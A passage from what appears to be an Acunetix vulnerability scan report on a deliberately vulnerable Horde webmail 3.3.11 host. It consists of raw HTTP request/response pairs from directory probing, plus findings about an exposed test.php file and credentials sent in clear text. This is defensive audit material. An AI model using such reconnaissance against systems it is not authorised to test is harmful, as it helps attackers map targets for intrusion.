User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Response
HTTP/1.1 301 Moved Permanently
Content-Type: text/html; charset=UTF-8
Location: http://vulnerable.horde.webmail.version3.3.11.host/imp/config/
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:31:22 GMT
Content-Length: 169
/imp/js/src
Details
No details are available.
Request
GET /imp/js/src HTTP/1.1
Accept: acunetix/wvs
Range: bytes=0-99999
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Response
HTTP/1.1 301 Moved Permanently
Content-Type: text/html; charset=UTF-8
Location: http://vulnerable.horde.webmail.version3.3.11.host/imp/js/src/
Server: Microsoft-IIS/7.5
Acunetix Website Audit27
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:37:03 GMT
/imp/scripts
Details
No details are available.
Request
GET /imp/scripts HTTP/1.1
Accept: acunetix/wvs
Range: bytes=0-99999
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Response
HTTP/1.1 301 Moved Permanently
Content-Type: text/html; charset=UTF-8
Location: http://vulnerable.horde.webmail.version3.3.11.host/imp/scripts/
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:30:23 GMT
Content-Length: 170
/imp/scripts/SQL
Details
No details are available.
Request
GET /imp/scripts/SQL HTTP/1.1
Accept: acunetix/wvs
Range: bytes=0-99999
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Response
HTTP/1.1 301 Moved Permanently
Content-Type: text/html; charset=UTF-8
Location: http://vulnerable.horde.webmail.version3.3.11.host/imp/scripts/SQL/
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 16:38:09 GMT
Content-Length: 174
/imp/scripts/sql
Details
No details are available.
Request
GET /imp/scripts/sql HTTP/1.1
Accept: acunetix/wvs
Range: bytes=0-99999
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Acunetix Website Audit28
Response
HTTP/1.1 301 Moved Permanently
Content-Type: text/html; charset=UTF-8
Location: http://vulnerable.horde.webmail.version3.3.11.host/imp/scripts/sql/
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 16:38:09 GMT
Content-Length: 174
/js/src
Details
No details are available.
Request
GET /js/src HTTP/1.1
Accept: acunetix/wvs
Range: bytes=0-99999
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Response
HTTP/1.1 301 Moved Permanently
Content-Type: text/html; charset=UTF-8
Location: http://vulnerable.horde.webmail.version3.3.11.host/js/src/
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:36:31 GMT
Content-Length: 165
Possible sensitive files
 
SeverityLow
TypeValidation
Reported by moduleScripting (Possible_Sensitive_Files.script)
Description
A possible sensitive file has been found. This file is not directly linked from the website. This check looks for common sensitive resources like password files, configuration files, log files, include files, statistics data, database dumps. Each one of these files could help an attacker to learn more about his target.
Impact
This file may expose sensitive information that could help a malicious user to prepare more advanced attacks.
Recommendation
Restrict access to this file or remove it from the website.
Affected items
/imp/test.php
Details
No details are available.
Request
GET /imp/test.php HTTP/1.1
Accept: acunetix/wvs
Range: bytes=0-99999
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Acunetix Website Audit29
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Vary: Accept-Language
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:30:26 GMT
Content-Length: 4560
User credentials are sent in clear text
 
SeverityLow
TypeInformational
Reported by moduleCrawler
Description
User credentials are not encrypted when they are transmitted.
Impact
A third party may be able to read the user credentials by intercepting an unencrypted HTTP connection.
Recommendation
Because user credentials usually are considered sensitive information, it is recommended to be sent to the server over an encrypted connection.
Affected items
/imp
Details
It seemes that user credentials are sent to /imp/redirect.php in clear text.
Request
GET /imp/ HTTP/1.1
Pragma: no-cache
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Vary: Accept-Language
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:13:11 GMT
Content-Length: 10191
Acunetix Website Audit30
/imp/index.php
Details
It seemes that user credentials are sent to /imp/redirect.php in clear text.
Request
GET /imp/index.php HTTP/1.1
Pragma: no-cache
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Vary: Accept-Language
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:13:11 GMT
Content-Length: 10191
/imp/login.php
Details
It seemes that user credentials are sent to /imp/redirect.php in clear text.
Request
GET /imp/login.php HTTP/1.1
Pragma: no-cache
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Vary: Accept-Language
Server: Microsoft-IIS/7.5
Set-Cookie: Horde=cc98ab8bb445fe090d5f7b594f58e208; path=/; domain=vulnerable.horde.webmail.version3.3.11.host
Set-Cookie: imp_key=cc98ab8bb445fe090d5f7b594f58e208; path=/; domain=vulnerable.horde.webmail.version3.3.11.host
Set-Cookie: auth_key=cc98ab8bb445fe090d5f7b594f58e208; path=/; domain=vulnerable.horde.webmail.version3.3.11.host
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:13:03 GMT
Content-Length: 10312
/imp/login.php (0543eee9a9fc90cdbcebb4184dc0f436)
Details
It seemes that user credentials are sent to /imp/redirect.php in clear text.
Acunetix Website Audit31
Request
GET /imp/login.php?app=imp&horde_logout_token=UkHoj_BUzaHgQnp7cwu9IPDGdx0&imapuser=cderdwxu&logout_reason=badlogin&server=pop HTTP/1.1
Pragma: no-cache
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Vary: Accept-Language
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:13:13 GMT
Content-Length: 10396
/imp/login.php (158764c7d282ec5f81da00419114f313)
Details
It seemes that user credentials are sent to /imp/redirect.php in clear text.
Request
GET /imp/login.php?new_lang=%26%23x202d;Chinese%20(Traditional)%20(%26%23x6b63;%26%23x9ad4;%26%23x4e2d;%26%23x6587;) HTTP/1.1
Pragma: no-cache
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Vary: Accept-Language
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:13:22 GMT
Content-Length: 10190
/imp/login.php (1d46c5eb93aa7d11eef06bf0a0191c08)
Details
It seemes that user credentials are sent to /imp/redirect.php in clear text.
Request
GET
Acunetix Website Audit32
/imp/login.php?app=imp&horde_logout_token=9kdIZoVZfUu0i92_Wr0XpxEkycw&imapuser=kknytbhi&logout_reason=badlogin&server=pop HTTP/1.1
Pragma: no-cache
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Vary: Accept-Language
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:13:09 GMT
Content-Length: 10396
/imp/login.php (1d86503a775e69aaf8cfae2e3c4262b8)
Details
It seemes that user credentials are sent to /imp/redirect.php in clear text.
Request
GET /imp/login.php?app=imp&horde_logout_token=8MnlK_AkVv_w-etJcyh00h3qZtk&imapuser=atsoewoc&logout_reason=badlogin&server=pop HTTP/1.1
Pragma: no-cache
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Vary: Accept-Language
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:13:09 GMT
Content-Length: 10396
/imp/login.php (218aabb29b4f5701fbeef27d6e22e8ae)
Details
It seemes that user credentials are sent to /imp/redirect.php in clear text.
Request
GET /imp/login.php?new_lang=%26%23x202d;Bulgarian%20(%26%23x0411;%26%23x044a;%26%23x043b;%26%23x0433;%26%23x0430;%26%23x0440;%26%23x0441;%26%23x043a;%26%23x0438;) HTTP/1.1
Pragma: no-cache
Acunetix Website Audit33
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Vary: Accept-Language
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:13:21 GMT
Content-Length: 10191
/imp/login.php (28fc832e122bfd3d7aa0d9fc9e93c214)
Details
It seemes that user credentials are sent to /imp/redirect.php in clear text.
Request
GET /imp/login.php?app=imp&horde_logout_token=fxkAiJl0cUvTGsyglzEAgwmsGvk&imapuser=bsximucj&logout_reason=badlogin&server=pop HTTP/1.1
Pragma: no-cache
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Vary: Accept-Language
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:13:09 GMT
Content-Length: 10396
/imp/login.php (2a85dcb007870d301225d725fb7aced5)
Details
It seemes that user credentials are sent to /imp/redirect.php in clear text.
Request
GET /imp/login.php?app=imp&horde_logout_token=S9hLBWmjg9w-hz-Cez65kwSQFDI&imapuser=hkuhjfvd&logout_reason=badlogin&server=pop HTTP/1.1
Pragma: no-cache
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Acunetix Website Audit34
Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Vary: Accept-Language
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:13:10 GMT
Content-Length: 10396
/imp/login.php (36ce5744f27f6f06f85c2dac9f0ac09c)
Details
It seemes that user credentials are sent to /imp/redirect.php in clear text.
Request
GET /imp/login.php?app=imp&horde_logout_token=rpo9s0fEQvr-PL8-6YEmPmL6eYE&imapuser=vhqsmkqh&logout_reason=badlogin&server=pop HTTP/1.1
Pragma: no-cache
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Vary: Accept-Language
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:13:13 GMT
Content-Length: 10396
/imp/login.php (3a784d3148a695e5246e4f7712293772)
Details
It seemes that user credentials are sent to /imp/redirect.php in clear text.
Request
GET /imp/login.php?app=imp&horde_logout_token=4IdDEVByjuc3qQ9aCCZa_zV1Ju0&imapuser=lyoxhoba&logout_reason=badlogin&server=pop HTTP/1.1
Pragma: no-cache
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Acunetix Website Audit35
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Vary: Accept-Language
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:13:09 GMT
Content-Length: 10396
/imp/login.php (4435f865242a495136a5f5376d63a435)
Details
It seemes that user credentials are sent to /imp/redirect.php in clear text.
Request
GET /imp/login.php?app=imp&horde_logout_token=pdL5-YjGG7Nh5C6m9jNlmZpORww&imapuser=ivxkbmfl&logout_reason=badlogin&server=pop HTTP/1.1
Pragma: no-cache
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Vary: Accept-Language
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:13:13 GMT
Content-Length: 10396
/imp/login.php (4bff40967d6a993cb33f6ffe4f726c45)
Details
It seemes that user credentials are sent to /imp/redirect.php in clear text.
Request
GET /imp/login.php?new_lang=%26%23x202d;Chinese%20(Simplified)%20(%26%23x7b80;%26%23x4f53;%26%23x4e2d;%26%23x6587;) HTTP/1.1
Pragma: no-cache
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Acunetix Website Audit36
 
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Vary: Accept-Language
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:13:21 GMT
Content-Length: 10191
/imp/login.php (733b34e2771d847f3e677868a914fc27)
Details
It seemes that user credentials are sent to /imp/redirect.php in clear text.
Request
GET /imp/login.php?app=imp&horde_logout_token=TDQA5rJjyTg4m99KcTR4_kGc2Ck&imapuser=ggqsiwfl&logout_reason=badlogin&server=pop HTTP/1.1
Pragma: no-cache
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Vary: Accept-Language
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:13:09 GMT
Content-Length: 10395
/imp/login.php (7f2892c38a099a99d15882e6395df8ed)
Details
It seemes that user credentials are sent to /imp/redirect.php in clear text.
Request
GET /imp/login.php?new_lang=Dansk HTTP/1.1
Pragma: no-cache
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Acunetix Website Audit37
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Vary: Accept-Language
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:13:22 GMT
/imp/login.php (81366dbb3a1b19d17070dae7247058f6)
Details
It seemes that user credentials are sent to /imp/redirect.php in clear text.
Request
GET /imp/login.php?app=imp&horde_logout_token=YOAPl3vWsuqm_TL_FXgl0owpZmM&imapuser=iyeojwka&logout_reason=badlogin&server=pop HTTP/1.1
Pragma: no-cache
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Vary: Accept-Language
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:13:13 GMT
Content-Length: 10396
/imp/login.php (8d2af24adeca98940d4ca72de057c259)
Details
It seemes that user credentials are sent to /imp/redirect.php in clear text.
Request
GET /imp/login.php?new_lang=%26%23x202d;Arabic%20(Syria)%20%26%23x202e;(%26%23x0627;%26%23x0644;%26%23x0639;%26%23x0631;%26%23x0628;%26%23x064a;%26%23x0629;) HTTP/1.1
Pragma: no-cache
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/login.php
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Acunetix Website Audit38
Vary: Accept-Language
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:13:21 GMT
/imp/login.php (92d3a0adc0d0c42811b54244a0913050)
Details
It seemes that user credentials are sent to /imp/redirect.php in clear text.
Request
GET /imp/login.php?app=imp&horde_logout_token=81ZHbgsWu6SDUtUtwCSI2FaJ-BE&imapuser=hurcfetk&logout_reason=badlogin&server=pop HTTP/1.1
Pragma: no-cache
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Vary: Accept-Language
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 22 May 2011 15:13:09 GMT
Content-Length: 10395
/imp/login.php (98144b1b8c67561c22adeba83a43a266)
Details
It seemes that user credentials are sent to /imp/redirect.php in clear text.
Request
GET /imp/login.php?app=imp&horde_logout_token=py6BVY4d7g6gx0ofFWB1kQ6hRdY&imapuser=sjtjgfnc&logout_reason=badlogin&server=pop HTTP/1.1
Pragma: no-cache
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Referer: http://vulnerable.horde.webmail.version3.3.11.host/imp/redirect.php
Cookie: Horde=f30a71ffa3e600c47245ba4d25fa54bf; imp_key=cc98ab8bb445fe090d5f7b594f58e208; auth_key=cc98ab8bb445fe090d5f7b594f58e208
Host: vulnerable.horde.webmail.version3.3.11.host
Connection: Keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Vary: Accept-Language
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Acunetix Website Audit39
